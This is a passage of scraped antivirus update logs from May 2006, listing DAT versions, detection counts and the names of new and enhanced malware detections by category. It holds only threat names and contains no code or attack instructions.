    W32/Mytob.fa@MM
    W32/Mytob.ft@MM
    W32/Mytob.fs@MM
    W32/Mytob.aw@MM
    W32/Mytob.fr@MM
    W32/Mytob.ba@MM
    W32/Mytob.bc@MM
    W32/Mytob.bb@MM
    W32/Mytob.bd@MM
    W32/Mytob.id@MM
    W32/Mytob.fu@MM
    W32/Mytob.fw@MM
    W32/Mytob.fv@MM
    W32/Mytob.ge@MM
    W32/Mytob.go@MM
    W32/Mytob.bu@MM
    W32/Mytob.bq@MM
    W32/Mytob.by@MM
    W32/Mytob.cq@MM
    W32/Mytob.ck@MM
    W32/Mytob.fz@MM
    W32/Mytob.gf@MM
    W32/Mytob.gn@MM
    W32/Mytob.gp@MM
    W32/Mytob.cw@MM
    W32/Mytob.p@MM
    W32/Mytob.i@MM
    W32/Mytob.k@MM
    W32/Mytob.r@MM
    W32/Mytob.gm@MM
    W32/Mytob.gs@MM
    W32/Mytob.m@MM
    W32/Mytob.bs@MM
    W32/Mytob.de@MM
    W32/Mytob.cb@MM
    W32/Mytob.do@MM
    W32/Mytob.dl@MM
    W32/Mytob.h@MM
    W32/Mytob.j@MM
    W32/Mytob.l@MM
    W32/Mytob.o@MM
    W32/Mytob.t@MM
    W32/Mytob.x@MM
    W32/Mytob.y@MM
    W32/Mytob.cr@MM
    W32/Mytob.cl@MM
    W32/Mytob.ci@MM
    W32/Mytob.cx@MM
    W32/Mytob.cy@MM
    W32/Mytob.dn@MM
    W32/Mytob.ei@MM
    W32/Mytob.aa@MM
    W32/Mytob.ad@MM
    W32/Mytob.dw@MM
    W32/Mytob.dv@MM
    W32/Mytob.du@MM
    W32/Mytob.aj@MM
    W32/Mytob.z@MM
    W32/Mytob.hq@MM
    W32/Mytob.eg@MM
    W32/Mytob.ho@MM
    W32/Mytob.hn@MM
    W32/Mytob.hk@MM
    W32/Mytob.hm@MM
    W32/Mytob.hj@MM
    W32/Mytob.ha@MM
    W32/Mytob.em@MM
    W32/Mytob.en@MM
  Email Generic (1)
    W32/Mytob.gen@MM
  Generic Worm (6)
    W32/Sdbot.worm.gen.as
    W32/Sdbot.worm.gen.w
    W32/Sdbot.worm.gen.bg
    W32/Sdbot.worm.gen.bh
    W32/Sdbot.worm.gen.by
    W32/Gaobot.worm.gen.by
  Win32 (1)
    New Win32.g1
  Worm (2)
    W32/Antinny.worm.ab
    W32/Antinny.worm.aa
Channel Image14:56 Virus Updates for May 24th, 2006» Virus Tracker
DAT Version:4769
DAT Release Date:5-24-2006
Threats Detected:192,662
New Detections:20
Enhanced Detections:181



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (1)
  Dropper (1)
    Spyware-Realtime-Spy.dr
Trojan (13)
   (5)
    SymbOS/Multidropper.bq!sis
    SymbOS/Multidropper.bo!sis
    SymbOS/Multidropper.bp!sis
    SymbOS/Multidropper.bs!sis
    SymbOS/Multidropper.br!sis
  Application extension Generi (1)
    Puper.dll.gen
  Downloader (2)
    Downloader-AWL
    Downloader-AWM
  Generic (2)
    Exploit-OleData.gen.gen
    Exploit-VBE.gen
  Heuristic (1)
    New Downloader.b
  Remote Access (2)
    BackDoor-CZW
    BackDoor-CZX
Virus (6)
  Application extension (1)
    W32/Sality.t.dll
  Email (1)
    W32/Mytob.ie@MM
  Parasitic (2)
    W32/HLLP.Philis.r
    W32/HLLP.82432
  Win32 (2)
    W32/Fontra.a
    W32/Sality.t
Program (9)
   (1)
    Generic PUP.a
  Adware (1)
    Adware-LinkMaker
  Configuration settings (1)
    ServU.ini
  Dialer (2)
    Dialer-Generic.e
    Dialer-Generic.f
  Downloader (1)
    Downloader-FL
  Internet Relay Chat (1)
    IRC/Client
  Spyware (1)
    Spyware-Realtime-Spy
  Win32 (1)
    Generic Dialer.ba
Trojan (68)
   (12)
    Generic Downloader.o
    SymbOS/Multidropper.bf!sis
    Generic Downloader.bd
    Ceegar
    SymbOS/Multidropper.bj!sis
    SymbOS/Multidropper.bh!sis
    SymbOS/Multidropper.bn!sis
    Generic BackDoor.bb
    SymbOS/Multidropper.bl!sis
    SymbOS/Multidropper.bk!sis
    SymbOS/Multidropper.bi!sis
    SymbOS/Multidropper.bg!sis
  AOL Password (1)
    PWS-AOLFake
  Configurator (2)
    Iroffer.cfg
    BackDoor-CEP.cfg
  Damaged (1)
    BackDoor-AWQ.b.dam
  Downloader (4)
    PWS-Banker.dldr
    Downloader-ZQ
    Downloader-ASH
    Downloader-ACR
  Dropper (3)
    BackDoor-CKB.dr
    BackDoor-CEP.dr
    PWS-Goldun.dr
  Exploit (1)
    Exploit-ITSSHeap
  Flooder (1)
    FDoS-AIMPunt
  Generic (4)
    Exploit-OleData.gen
    PWS-Banker.gen.bb
    PWS-Banker.gen.b
    ServU-Daemon.gen.ba
  Heuristic (3)
    New Malware.n
    New Malware.u
    New Malware.j
  Internet Relay Chat (1)
    IRC/Flood.cg
  Password (3)
    PWS-LegMir
    PWS-Msnfake
    PWS-LDPinch
  Password Stealer (6)
    PWS-JA
    PWS-Banker.gen.ba
    PWS-MSNFake.a
    PWS-Banker.gen.i
    PWS-Banker.gen.h
    PWS-WoW
  ProcKill (1)
    ProcKill-AK
  Proxy (2)
    Proxy-Horst
    Proxy-Piky
  Remote Access (6)
    BackDoor-AWQ.b
    BackDoor-CGZ
    BackDoor-CPX
    BackDoor-CMQ
    BackDoor-CKB
    BackDoor-CEP
  Spam (1)
    Spam-Loot
  Win32 (16)
    Generic VB
    IRC/Flood.cm
    HackerDefender
    Generic MultiDropper.k
    Generic VB.b
    Spy-Agent.l
    Puper
    Generic BackDoor.bc
    Generic Downloader.u
    Swizzor
    Generic Downloader.x
    Generic PWS.o
    Generic BackDoor.u
    Generic Downloader.ab
    Generic VB.c
    Generic Proxy.g
Virus (104)
  Application extension (4)
    W32/Sality.dll
    W32/Sality.n.dll
    W32/Sality.m.dll
    W32/Sality.p.dll
  Damaged (1)
    W32/Mytob.dam
  Damaged Worm (2)
    W32/Gaobot.worm.dam
    W32/Protoride.worm.dam
  E-mail (1)
    W32/Mytob.gr@MM
  E-mail worm (1)
    W32/Duel@MM
  Email (71)
    W32/Mytob.ao@MM
    W32/Mytob.al@MM
    W32/Mytob.ew@MM
    W32/Mytob.fa@MM
    W32/Mytob.ft@MM
    W32/Mytob.fs@MM
    W32/Mytob.aw@MM
    W32/Mytob.fr@MM
    W32/Mytob.ba@MM
    W32/Mytob.bc@MM
    W32/Mytob.bb@MM
    W32/Mytob.bd@MM
    W32/Mytob.id@MM
    W32/Mytob.fu@MM
    W32/Mytob.fw@MM
    W32/Mytob.fv@MM
    W32/Mytob.ge@MM
    W32/Mytob.go@MM
    W32/Mytob.bu@MM
    W32/Mytob.bq@MM
    W32/Mytob.by@MM
    W32/Mytob.cq@MM
    W32/Mytob.ck@MM
    W32/Mytob.fz@MM
    W32/Mytob.gf@MM
    W32/Mytob.gn@MM
    W32/Mytob.gp@MM
    W32/Mytob.cw@MM
    W32/Mytob.p@MM
    W32/Mytob.i@MM
    W32/Mytob.k@MM
    W32/Mytob.r@MM
    W32/Mytob.gm@MM
    W32/Mytob.gs@MM
    W32/Mytob.m@MM
    W32/Mytob.bs@MM
    W32/Mytob.de@MM
    W32/Mytob.cb@MM
    W32/Mytob.do@MM
    W32/Mytob.dl@MM
    W32/Mytob.h@MM
    W32/Mytob.j@MM
    W32/Mytob.l@MM
    W32/Mytob.o@MM
    W32/Mytob.t@MM
    W32/Mytob.x@MM
    W32/Mytob.y@MM
    W32/Mytob.cr@MM
    W32/Mytob.cl@MM
    W32/Mytob.ci@MM
    W32/Mytob.cx@MM
    W32/Mytob.cy@MM
    W32/Mytob.dn@MM
    W32/Mytob.ei@MM
    W32/Mytob.aa@MM
    W32/Mytob.ad@MM
    W32/Mytob.dw@MM
    W32/Mytob.dv@MM
    W32/Mytob.du@MM
    W32/Mytob.aj@MM
    W32/Mytob.z@MM
    W32/Mytob.hq@MM
    W32/Mytob.eg@MM
    W32/Mytob.ho@MM
    W32/Mytob.hn@MM
    W32/Mytob.hk@MM
    W32/Mytob.hm@MM
    W32/Mytob.hj@MM
    W32/Mytob.ha@MM
    W32/Mytob.em@MM
    W32/Mytob.en@MM
  Email Generic (1)
    W32/Mytob.gen@MM
  Exploit (1)
    Exploit-MS04-11
  Generic Worm (14)
    W32/Gaobot.worm.gen.e
    W32/IRCbot.worm.gen
    W32/Sdbot.worm.gen.w
    W32/Sdbot.worm.gen.n
    W32/Sdbot.worm.gen.h
    W32/Sdbot.worm.gen.ca
    W32/Sdbot.worm.gen.ae
    W32/Sdbot.worm.gen.cc
    W32/Spybot.worm.gen.p
    W32/Combra.worm.gen
    W32/Sdbot.worm.gen.ag
    W32/Sdbot.worm.gen.bh
    W32/Sdbot.worm.gen.by
    W32/Gaobot.worm.gen.bi
  Internet Worm (1)
    W32/Generic.worm!p2p
  mIRC Worm (1)
    W32/Protoride.worm
  Win32 (5)
    W32/Loosky
    W32/Sality.q
    W32/Sality.p
    W32/Sality.n
    W32/Sality.m
  Worm (1)
    W32/Opanki.worm
Channel Image14:56 Virus Updates for May 23nd, 2006» Virus Tracker
DAT Version:4768
DAT Release Date:5-23-2006
Threats Detected:192,370
New Detections:9
Enhanced Detections:92



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (1)
  Dropper (1)
    Adware-Boran.dr
Trojan (5)
   (1)
    Generic Downloader.bk
  Exploit (1)
    Exploit-OleData
  StartPage (1)
    StartPage-JI
  Win32 (2)
    QLowZones-40
    Spy-Agent.ay
Virus (3)
  Generic Worm (1)
    W32/Sdbot.worm.gen.cc
  Worm (2)
    W32/Shodi.worm.v
    W32/Ghandh.worm
Malware (1)
  Win32 (1)
    Exploit-Mydoom
Program (17)
   (1)
    Generic PUP.a
  - (2)
    Starr
    RemAdm-PSKill
  Adware (9)
    Adware-180SA
    Adware-Look2Me
    Adware-ISTBar
    Adware-Exactsearch
    Adware-MediaTickets
    Adware-Boran
    Adware-ZangoSA
    Adware-Shorty
    Adware-ClickSpring
  Dialer (1)
    Dialer-Egroup
  Downloader (1)
    Adware-ZangoSA.dldr
  Dropper (1)
    Adware-ExactSearch.dr
  Keylogger (1)
    Keylog-Ardamax
  Win32 (1)
    Fport
Trojan (52)
   (3)
    Generic Proxy.h
    AdClicker-EJ
    BraveSentry
  Application extension (1)
    PWS-Lineage.dll
  Downloader (6)
    Downloader-AWA
    Downloader-AFY
    PWS-Banker.dldr
    Downloader-ZQ
    Downloader-ASH
    Downloader-ARL
  Dropper (5)
    BackDoor-CKB.dr
    AdClicker-EJ.dr
    Kurofoo.dr
    MultiDropper-NB
    BackDoor-COC.dr
  Exploit (1)
    Exploit-ITSSHeap
  Generic (5)
    Exploit-OleData.gen
    PWS-Banker.gen.bb
    PWS-Banker.gen.t
    Exploit-MS06-012.gen
    Exploit-MS06-004.gen
  Heuristic (2)
    New Malware.d
    New Malware.u
  Password (1)
    PWS-LDPinch
  Password Stealer (3)
    PWS-Banker.gen.i
    PWS-Vassay
    PWS-Lineage
  Proxy (2)
    Proxy-Agent.ai
    Proxy-Raser
  Remote Access (6)
    BackDoor-ARR
    BackDoor-AWQ.b
    BackDoor-CVM
    BackDoor-CWM
    BackDoor-BAC.sys
    BackDoor-CMQ
  Spam (1)
    Tabela
  Win32 (16)
    DollarRevenue
    OptixKiller
    DDoS-Slack
    HackerDefender.sys
    Generic Downloader.ak
    QLowZones-33
    Generic Uploader.a
    FakeAlert-C
    Puper
    Kurofoo
    Swizzor
    Generic PWS.o
    Generic Dropper.i
    Generic BackDoor.u
    Generic Downloader.ab
    Kakkeys
Virus (22)
   (10)
    SymbOS/Commwarrior.h!sis
    SymbOS/Commwarrior.b!sis
    SymbOS/Commwarrior.a!sis
    SymbOS/Commwarrior.j!sis
    SymbOS/Commwarrior.c!sis
    SymbOS/Commwarrior.g!sis
    SymbOS/Commwarrior.i!sis
    SymbOS/Commwarrior.f!sis
    SymbOS/Commwarrior.d!sis
    SymbOS/Commwarrior.e!sis
  E-mail worm (1)
    W32/Combra.worm
  Email Generic (1)
    JS/Feebs.gen.f@MM
  Generic (1)
    SymbOS/Commwarrior.gen!sis
  Generic Worm (7)
    W32/Sdbot.worm.gen.h
    W32/Sdbot.worm.gen.bz
    W32/Sdbot.worm.gen.bo
    W32/Sdbot.worm.gen.bd
    W32/Sdbot.worm.gen.bi
    W32/Sdbot.worm.gen.bj
    W32/Bobax.worm.gen
  Internet Relay Chat Worm (1)
    W32/Akbot
  Win32 (1)
    W32/Puce
Channel Image14:56 Virus Updates for May 22nd, 2006» Virus Tracker
DAT Version:4767
DAT Release Date:5-22-2006
Threats Detected:192,152
New Detections:20
Enhanced Detections:214



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Program (1)
  Tool (1)
    Tool-UnloadDLL
Trojan (13)
   (8)
    SymbOS/PBsender.g!app
    SymbOS/PBsender.g!sis
    SymbOS/PBsender.e!sis
    Generic Downloader.bd
    Ceegar
    SymbOS/PBsender.e!app
    SymbOS/PBsender.f!sis
    SymbOS/PBsender.d!sis
  Application extension (1)
    BackDoor-CPY.dll
  Exploit (2)
    Exploit-MailFox
    Exploit-ITSSHeap
  Linux (1)
    Linux/Phobi
  Remote Access (1)
    BackDoor-CKB!6708ddaf
Virus (6)
   (1)
    SymbOS/Cabir.z!sis
  Dropper (1)
    MLS/Lagob.dr
  Win32 (1)
    W32/Brepibot!8192
  Worm (3)
    Hilder.worm!bat
    W32/Skowor.worm
    W32/Genrack.worm
Program (10)
   (1)
    Generic PUP.a
  - (1)
    RemAdm-PSKill
  Adware (4)
    Adware-ISTBar
    Adware-NaviPromo
    Adware-Newweb
    Adware-DropSpam
  Generic (1)
    Dialer-RAS.gen.aa
  Spyware (1)
    Spyware-RealSpy
  Win32 (2)
    ServU-Daemon
    Generic Adware.aa
Trojan (78)
   (4)
    Generic BackDoor.d
    Generic Dropper.o
    Generic BackDoor.bb
    QHosts-18!hosts
  - (3)
    BackDoor-AOU
    W32/Bagle.dll.dr
    AdClicker-AJ
  Application extension (3)
    Puper.dll
    BackDoor-CKB.dll
    BackDoor-CXO.dll
  Configurator (1)
    Generic PWS.b.cfg
  Downloader (6)
    Downloader-ATM!CME-934
    Downloader-ATM!CME-503
    Downloader-ZQ
    Downloader-ATM
    Downloader-ASH
    Downloader-ARL
  Dropper (6)
    VBS/Inor
    PWS-LDPinch.dr
    BackDoor-CZL.dr
    BackDoor-CKB.dr
    Puper.dr
    MultiDropper-QH
  Generic (6)
    Exploit-MhtRedir.gen
    Exploit-OleData.gen
    Swizzor.gen
    PWS-Banker.gen.bb
    PWS-Banker.gen.t
    Generic Downloader.gen.bc
  Generic Worm (1)
    W32/Sdbot.worm.gen.ax
  Heuristic (2)
    New Malware.u
    New Malware.ab
  Java Applet (1)
    JV/Shinwow
  Password (2)
    PWS-LegMir
    PWS-LDPinch
  Password Stealer (8)
    Generic PWS.b
    PWS-JA
    PWS-Banker.gen.ba
    PWS-Banker.gen.i
    PWS-Cashgrabber
    PWS-Banker.bh
    PWS-Lineage
    PWS-Mifeng
  PDA Device (1)
    SymbOS/Skulls.a
  Proxy (1)
    Proxy-Horst
  Remote Access (8)
    BackDoor-AWQ.b
    BackDoor-AVW
    BackDoor-BCB
    BackDoor-CKB.sys
    BackDoor-CPX
    BackDoor-CPY
    BackDoor-CMQ
    BackDoor-CKB
  Script (2)
    Generic component
    PHP/Defash
  Server (1)
    BackDoor-CUR.svr
  Win32 (22)
    Generic Downloader.a
    HackerDefender
    Generic BackDoor.bg
    DollarRevenue
    Puper
    Generic Downloader.j
    Generic Downloader.s
    Generic Downloader.be
    Generic BackDoor.be
    Generic BackDoor.ba
    Generic Downloader.u
    Generic PWS.o
    Generic QLowZones.a
    Generic Dropper.i
    Generic Downloader.ab
    Generic VB.c
    CryZip
    AdClicker-DW
    Generic Proxy.e
    Spy-Agent.y
    Generic Downloader.g
    Generic AdClicker.c
Virus (126)
   (16)
    SymbOS/Skulls.ci
    SymbOS/Skulls.f
    SymbOS/Skulls.e
    SymbOS/Skulls.g
    SymbOS/Skulls.h
    SymbOS/Skulls.i
    SymbOS/Skulls.cf
    SymbOS/Skulls.cg
    SymbOS/PBsender.d!app
    SymbOS/PBsender.c!app
    SymbOS/PBsender.a!app
    SymbOS/PBsender.b!app
    SymbOS/Skulls.c
    SymbOS/Skulls!aif
    SymbOS/Skulls.d
    SymbOS/Skulls.ca
  Damaged (1)
    W32/Netsky.dam
  Dropper (1)
    W32/Areses.dr
  Dropper Email (1)
    W32/Mytob.dr@MM
  E-mail (10)
    W32/Mytob.be@MM
    W32/Mytob.bi@MM
    W32/Mytob.bj@MM
    W32/Mytob.bo@MM
    W32/Mytob.bl@MM
    W32/Mytob.br@MM
    W32/Mytob.bf@MM
    W32/Mytob.cg@MM
    W32/Mytob.ch@MM
    W32/Areses.h
  Email (65)
    W32/Mytob.hr@MM
    W32/Mytob.b@MM
    W32/Mytob.a@MM
    W32/Mytob.ev@MM
    W32/Mytob.at@MM
    W32/Mytob.ib@MM
    W32/Mytob.av@MM
    W32/Mytob.au@MM
    W32/Mytob.hy@MM
    W32/Mytob.fy@MM
    W32/Mytob.fw@MM
    W32/Mytob.fx@MM
    W32/Mytob.gg@MM
    W32/Mytob.gl@MM
    W32/Mytob.gj@MM
    W32/Mytob.gi@MM
    W32/Mytob.hs@MM
    W32/Mytob.bg@MM
    W32/Mytob.bx@MM
    W32/Mytob.cd@MM
    W32/Mytob.gd@MM
    W32/Mytob.gc@MM
    W32/Mytob.gb@MM
    W32/Mytob.ga@MM
    W32/Mytob.gf@MM
    W32/Mytob.gp@MM
    W32/Mytob.gq@MM
    W32/Mytob.bn@MM
    W32/Mytob.dh@MM
    W32/Mytob.r@MM
    W32/Mytob.e@MM
    W32/Mytob.c@MM
    W32/Mytob.gt@MM
    W32/Mytob.g@MM
    W32/Mytob.bt@MM
    W32/Mytob.bp@MM
    W32/Mytob.ct@MM
    W32/Mytob.cf@MM
    W32/Mytob.dd@MM
    W32/Mytob.ca@MM
    W32/Mytob.n@MM
    W32/Mytob.f@MM
    W32/Mytob.d@MM
    W32/Mytob.cs@MM
    W32/Mytob.dk@MM
    W32/Mytob.dz@MM
    W32/Mytob.eb@MM
    W32/Mytob.ds@MM
    W32/Mytob.ea@MM
    W32/Mytob.gu@MM
    W32/Mytob.gx@MM
    W32/Mytob.hq@MM
    W32/Mytob.ej@MM
    W32/Mytob.hp@MM
    W32/Mytob.gy@MM
    W32/Mytob.hf@MM
    W32/Mytob.gw@MM
    W32/Mytob.gz@MM
    W32/Mytob.hg@MM
    W32/Mytob.hh@MM
    W32/Mytob.hi@MM
    W32/Mytob.gv@MM
    W32/Mytob.he@MM
    W32/Mytob.es@MM
    W32/Mytob.eq@MM
  Email Generic (2)
    W32/Mytob.gen@MM
    W32/Feebs.gen@MM
  Generic (3)
    SymbOS/Skulls.gen
    W32/Lemoor.gen
    SymbOS/PBsender.gen!app
  Generic Worm (15)
    W32/Sdbot.worm.gen.as
    W32/Sdbot.worm.gen.bg
    W32/Sdbot.worm.gen.n
    W32/Sdbot.worm.gen.h
    W32/Sdbot.worm.gen.bl
    W32/Sdbot.worm.gen.bs
    W32/Sdbot.worm.gen.bz
    W32/Sdbot.worm.gen.bo
    W32/Sdbot.worm.gen.bd
    W32/Sdbot.worm.gen.bh
    W32/Sdbot.worm.gen.bi
    W32/Sdbot.worm.gen.by
    W32/Sdbot.worm.gen.bj
    W32/Sdbot.worm.gen.bw
    W32/Bobax.worm.gen
  Internet Worm (2)
    W32/NoChod@MM
    W32/Mytob.bk@MM
  Script (1)
    VBS/Pazuzu
  Win32 (6)
    New Win32.g1
    New Poly Win32
    W32/Areses.f
    W32/Areses.g
    W32/Generic.n
    W32/Feebs!rootkit
  Worm (3)
    W32/Sites.worm
    W32/Mytob.worm!im
    W32/Opanki.worm
Channel Image14:56 Virus Updates for May 19th, 2006» Virus Tracker
DAT Version:4766
DAT Release Date:5-19-2006
Threats Detected:191,789
New Detections:6
Enhanced Detections:114



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Trojan (5)
Damaged (1)
Exploit-ScriptNull.dam
Password Stealer (1)
PWS-Agent.c
Remote Access (1)
BackDoor-CKB!cfaae1e6
Win32 (2)
Generic Downloader.be
MayArchive
Virus (1)
Email (1)
W32/Areses.m@MM
Internet Worm (1)
E-mail (1)
W32/Areses.a@MM
Program (10)
Adware (4)
Adware-Adpower
Adware-MediaTickets
Adware-DesktopMedia
Adware-SurfSideKick
Application extension (1)
Adware-SurfSideKick.dll
Dropper (1)
Spyware-WebHancer.dr
Generic (1)
Dialer-RAS.gen.aa
Spyware (1)
Spyware-RealSpy
Win32 (2)
Generic HTool.bb
Generic Dialer.ba
Trojan (57)
(3)
Generic BackDoor.bb
Generic.dc
Painter
Application extension (2)
Puper.dll
AdClicker-AF.dll
Configurator (1)
Generic PWS.b.cfg
Dialer (1)
QDial-43
Downloader (7)
Downloader-ABU
Downloader-ATM!CME-934
Downloader-ATM!CME-503
Downloader-ZQ
Downloader-ATM
Downloader-ASH
Downloader-ACR
Dropper (5)
PWS-LDPinch.dr
QDial-43.dr
MultiDropper-OP
MultiDropper-OU
Puper.dr
Dropper Generic (1)
W32/Sdbot.dr.gen
Exploit (3)
Exploit-DcomRpc
JS/Exploit-HelpXSite
Exploit-DirTraversal
Generic (6)
Exploit-DcomRpc.gen
Perl/Exploit.gen
Proxy-Mitglieder.gen.b
Exploit-OleData.gen
PWS-Banker.gen.bb
PWS-Banker.gen.t
Generic Worm (1)
W32/Sdbot.worm.gen.ax
Heuristic (5)
New Malware.n
New Malware.u
New Malware.f
New Malware.aj
New Malware.ae
Password (1)
PWS-LDPinch
Password Stealer (6)
Generic PWS.b
PWS-QQDrag
PWS-Banker.gen.ba
PWS-Poker
PWS-Banker.gen.i
PWS-Banker.gen.h
Proxy (1)
Proxy-Horst
Remote Access (4)
BackDoor-AZV
BackDoor-AWQ.b
BackDoor-AVW
BackDoor-CKB
Win32 (10)
Generic Downloader.c
Generic Downloader.bb
Generic Downloader.y
Swizzor
Generic PWS.o
Zquest
Generic Dropper.i
Generic BackDoor.u
Generic Downloader.ab
Generic Proxy.g
Virus (46)
E-mail (3)
W32/Areses.k@MM
W32/Mytob.bh@MM
W32/Areses.j@MM
Email (33)
W32/Mytob.ak@MM
W32/Mytob.am@MM
W32/Mytob.ar@MM
W32/Mytob.aq@MM
W32/Mytob.ex@MM
W32/Areses.l@MM
W32/Mytob.gk@MM
W32/Areses.i@MM
W32/Areses.h@MM
W32/Mytob.cu@MM
W32/Mytob.ce@MM
W32/Mytob.dg@MM
W32/Mytob.dc@MM
W32/Mytob.r@MM
W32/Mytob.di@MM
W32/Mytob.df@MM
W32/Mytob.dj@MM
W32/Mytob.v@MM
W32/Mytob.u@MM
W32/Mytob.t@MM
W32/Mytob.y@MM
W32/Mytob.cz@MM
W32/Mytob.dm@MM
W32/Mytob.ah@MM
W32/Mytob.dq@MM
W32/Mytob.dt@MM
W32/Mytob.ag@MM
W32/Mytob.an@MM
W32/Mytob.ec@MM
W32/Mytob.ef@MM
W32/Mytob.eo@MM
W32/Mytob.er@MM
W32/Mytob.ep@MM
Email Generic (1)
W32/Mytob.gen@MM
Generic Worm (7)
W32/Sdbot.worm.gen.bg
W32/Sdbot.worm.gen.n
W32/Sdbot.worm.gen.bs
W32/Sdbot.worm.gen.bp
W32/Sdbot.worm.gen.bh
W32/Sdbot.worm.gen.bw
W32/Sdbot.worm.gen.t
Script (1)
VBS/Generic
Worm (1)
W32/Opanki.worm
Channel Image14:56 Virus Updates for May 18th, 2006» Virus Tracker
DAT Version:4765
DAT Release Date:5-18-2006
Threats Detected:191,481
New Detections:13
Enhanced Detections:123



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Full list

New DetectionsEnhanced detections
Trojan (4)
  Downloader (2)
    Downloader-AWJ
    Downloader-AWK
  Password Stealer (1)
    PWS-Banker.gen.ac
  Registry (1)
    QReg-16
Virus (9)
  Downloader (1)
    W32/Bagle.ey.dldr
  Email (3)
    W32/Kidala.c@MM
    W32/Areses.l@MM
    W32/Bagle.ez@MM
  Macro (2)
    X97M/Skowor
    W97M/Tomber
  Script (3)
    VBS/Lesto
    VBS/Pazuzu
    VBS/Entrophy
Internet Worm (4)
  E-mail (3)
    W32/Kidala.b@MM
    W32/Areses.a@MM
    W32/Kidala.a@MM
  File Deletion (1)
    W32/Erazor.worm
Program (2)
  Adware (1)
    Adware-Zeno
  Win32 (1)
    Winfixer
Trojan (63)
   (2)
    Generic Dropper.b
    Generic BackDoor.bb
  - (1)
    Spam-Mailbot
  Application extension (1)
    BackDoor-CSN.dll
  Downloader (8)
    W32/Bagle.cj
    BackDoor-CYY.dldr
    Downloader-AWF
    Downloader-AWI
    PWS-Banker.dldr
    W32/Bagle.dk
    Downloader-ABU
    Downloader-ACR
  Dropper (3)
    BackDoor-AWQ.b.dr
    BackDoor-CSN.dr
    Puper.dr
  Dropper Generic (1)
    W32/Sdbot.dr.gen
  Exploit (1)
    Exploit-DcomRpc
  Generic (9)
    Generic Downloader.gen.bd
    Generic Downloader.gen.be
    PWS-Banker.gen.ab
    PWS-Banker.gen.bb
    ASP/BackDoor.gen
    PWS-Banker.gen.j
    PWS-Banker.gen.t
    ServU-Daemon.gen.ba
    APStrojan.gen5e
  Heuristic (3)
    New Malware.n
    New Malware.j
    New Malware.ag
  Password (1)
    PWS-LegMir
  Password Stealer (3)
    PWS-Banker.gen.ba
    PWS-Poker
    PWS-Banker.gen.i
  Proxy (1)
    Proxy-FBSR
  Remote Access (9)
    BackDoor-AZV
    BackDoor-AWQ.b
    BackDoor-CUL
    BackDoor-CVM
    BackDoor-CMQ
    BackDoor-CYX
    BackDoor-CYY
    BackDoor-CMR
    BackDoor-CMI
  Script (2)
    Generic component
    Erazor.bat
  Win32 (18)
    Generic Downloader.c
    Generic VB.b
    Puper
    Generic Downloader.s
    Generic BackDoor.be
    Generic BackDoor.bd
    Generic BackDoor.ba
    Generic Downloader.y
    Swizzor
    Generic Downloader.r
    Generic PWS.o
    Generic QLowZones.a
    Generic Dropper.i
    Generic BackDoor.u
    Generic Downloader.ab
    Generic PWS.s
    Spy-Agent.ak
    Generic MultiDropper.b
Virus (54)
  Application extension (3)
    W32/Bagle.ew.dll
    W32/Bagle.dll
    W32/Bagle.ex.dll
  Damaged Worm (1)
    W32/Sdbot.worm.dam
  Downloader (4)
    W32/Bagle.ci
    W32/Bagle.ck
    W32/Bagle.cl
    W32/Bagle.cn
  Dropper (1)
    Bat/Kads.dr
  E-mail (2)
    W32/Areses.k@MM
    W32/Areses.j@MM
  Email (2)
    W32/Areses.i@MM
    W32/Areses.h@MM
  Floppy (1)
    W32/Generic!floppy
  Generic Worm (20)
    W32/IRCbot.worm.gen
    W32/Spybot.worm.gen.bx
    W32/Gaobot.worm.gen.bj
    W32/Opanki.worm.gen
    W32/Sdbot.worm.gen.l
    W32/Sdbot.worm.gen.h
    W32/Sdbot.worm.gen.ca
    W32/Sdbot.worm.gen.bk
    W32/Sdbot.worm.gen.ae
    W32/Sdbot.worm.gen.bs
    W32/Sdbot.worm.gen.bz
    W32/Sdbot.worm.gen.bp
    W32/Sdbot.worm.gen.bo
    W32/Spybot.worm.gen.o
    W32/Sdbot.worm.gen.bh
    W32/Sdbot.worm.gen.bi
    W32/Sdbot.worm.gen.by
    W32/Sdbot.worm.gen.bj
    W32/Sdbot.worm.gen.bw
    W32/Sdbot.worm.gen.ac
  Macro (1)
    X97M/Anis
  Peer To Peer (1)
    W32/Generic.d!p2p
  Script (2)
    VBS/Generic
    Bat/Kads
  Win32 (15)
    New Win32
    W32/Generic.d
    W32/Bagle.cw
    W32/Bagle.cu
    W32/Bagle.cr
    W32/Bagle.co
    W32/Bagle.cm
    W32/Bagle.cx
    W32/Bagle.cv
    W32/Bagle.cs
    W32/Bagle.an
    W32/Generic.e
    Generic BackDoor.bf
    W32/Generic!msn
    W32/Generic!im
  Worm (1)
    W32/Generic.worm.b
Channel Image14:56 Virus Updates for May 17th, 2006» Virus Tracker
DAT Version:4764
DAT Release Date:5-17-2006
Threats Detected:190,899
New Detections:17
Enhanced Detections:121



Enhanced detections are those that have been modified for this release. Detections are enhanced to cover new variants, optimize performance, and correct incorrect identifications.

Noteworthy threats are those that had an AVERT risk assessment of Low-Profiled, Medium, Medium-On-Watch, High, or High-Outbreak at the time of DAT release.

Noteworthy Threats:

NameCorporate Risk AssessmentHome Risk Assessment
PWS-Poker

Low-Profiled

Low-Profiled

Full list

New DetectionsEnhanced detections
Program (4)
  Adware (1)
    Adware-Give4Free
  Joke (1)
    Joke-Tsunami
  Win32 (2)
    Generic Keylog.d
    DRMProt
Trojan (12)
   (2)
    Spy-Agent.ax
    AdClicker-EJ
  Configurator (1)
    Orifice.cfg
  Dialer (1)
    QDial-43
  Downloader (2)
    Downloader-AWH
    Downloader-AWI
  Dropper (2)
    QDial-43.dr
    AdClicker-EJ.dr
  Password Stealer (1)
    PWS-Poker
  Script (1)
    AdClicker-EJ!hta
  Win32 (2)
    TrapMouseKey
    Benal
Virus (1)
  Win32 (1)
    W32/Lebmog
Internet Worm (2)
  E-mail (1)
    W32/Areses.a@MM
  File Deletion (1)
    W32/Erazor.worm
Program (12)
   (2)
    Generic PUP.a
    Generic PUP.b
  Adware (1)
    Adware-Starware
